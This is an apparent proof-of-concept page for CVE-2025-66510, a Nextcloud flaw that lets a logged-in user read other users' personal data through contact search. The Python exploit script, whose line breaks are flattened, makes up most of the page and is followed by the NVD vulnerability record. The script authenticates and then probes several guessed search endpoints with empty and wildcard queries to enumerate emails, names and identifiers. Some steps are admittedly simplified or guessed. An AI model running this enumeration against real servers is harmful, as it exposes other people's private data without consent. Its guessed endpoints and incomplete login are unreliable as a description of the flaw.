CVE-2025-66510

import requests import json # CVE-2025-66510 PoC - Nextcloud Contact Search Information Disclosure # Target: Nextcloud Server < 31.0.10, < 32.0.1 # Author: Security Researcher TARGET_URL = "https://vulnerable-nextcloud-server.com" USERNAME = "[email protected]" PASSWORD = "attacker_password" def authenticate(): """Authenticate to Nextcloud and get session cookie""" session = requests.Session() login_url = f"{TARGET_URL}/index.php/login" # Get requesttoken for login response = session.get(login_url) # Extract requesttoken from response (simplified) login_data = { "user": USERNAME, "password": PASSWORD } response = session.post(login_url, data=login_data, allow_redirects=True) if response.status_code == 200: return session return None def exploit_contact_search(session): """Exploit the contact search to leak user information""" # Search endpoint - may vary based on Nextcloud version search_endpoints = [ "/index.php/apps/dav/api_v2/direct_search/contacts", "/remote.php/dav/contacts/search", "/index.php/settings/users/users" ] # Search query to enumerate users search_payloads = [ {"search":""}, # Empty search might return all contacts {"term":"a"}, # Common prefix to enumerate users {"query":"*"} ] results = [] for endpoint in search_endpoints: for payload in search_payloads: try: response = session.get( f"{TARGET_URL}{endpoint}", params=payload, timeout=10 ) if response.status_code == 200: data = response.json() if data: results.append({ "endpoint": endpoint, "payload": payload, "data": data }) except Exception as e: continue return results def main(): print("[*] CVE-2025-66510 PoC - Nextcloud Contact Search Info Disclosure") print(f"[*] Target: {TARGET_URL}") # Step 1: Authenticate print("\n[1] Authenticating to Nextcloud...") session = authenticate() if not session: print("[-] Authentication failed") return print("[+] Authentication successful") # Step 2: Exploit contact search print("\n[2] Exploiting contact search vulnerability...") results = exploit_contact_search(session) if results: print(f"[+] Found {len(results)} potential information leaks:") for i, result in enumerate(results, 1): print(f"\n--- Result {i} ---") print(f"Endpoint: {result['endpoint']}") print(f"Payload: {result['payload']}") print(f"Data: {json.dumps(result['data'], indent=2)}") else: print("[-] No information leaks found (target may be patched)") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-66510", "sourceIdentifier": "[email protected]", "published": "2025-12-05T17:16:04.613", "lastModified": "2025-12-10T16:12:34.217", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nextcloud Server is a self hosted personal cloud system. In Nextcloud Server prior to 31.0.10 and 32.0.1 and Nextcloud Enterprise Server prior to 28.0.14.11, 29.0.16.8, 30.0.17.3, and 31.0.10, contacts search allowed to retrieve personal data of other users (emails, names, identifiers) without proper access control. This allows an authenticated user to retrieve information about accounts that are not related or added as contacts."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N", "baseScore": 4.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-359"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "28.0.0", "versionEndExcluding": "28.0.14.11", "matchCriteriaId": "B55EF258-E98A-43A9-B73C-AE62D448421D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "29.0.0", "versionEndExcluding": "29.0.16.8", "matchCriteriaId": "7710228F-2984-4F9A-8360-0054E7E78687"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "30.0.0", "versionEndExcluding": "30.0.17.3", "matchCriteriaId": "9D119C97-0478-4CE4-8DAF-A72F69DC8C50"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:-:*:*:*", "versionStartIncluding": "31.0.0", "versionEndExcluding": "31.0.10", "matchCriteriaId": "2059C891-F256-482A-99BF-D912A1657419"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "31.0.0", "versionEndExcluding": "31.0.10", "matchCriteriaId": "64C21E45-22B8-49B2-B630-30448D89A4E9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:-:*:*:*", "versionStartIncluding": "32.0.0", "versionEndExcluding": "32.0.1", "matchCriteriaId": "A75D466C-B154-480A-9D4F-8E9454147156"}]}]}], "references": [{"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-495w-cqv6-wr59", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://github.com/nextcloud/server/commit/e4866860cbf24a746eb8a125587262a4c8831c57", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nextcloud/server/pull/55657", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}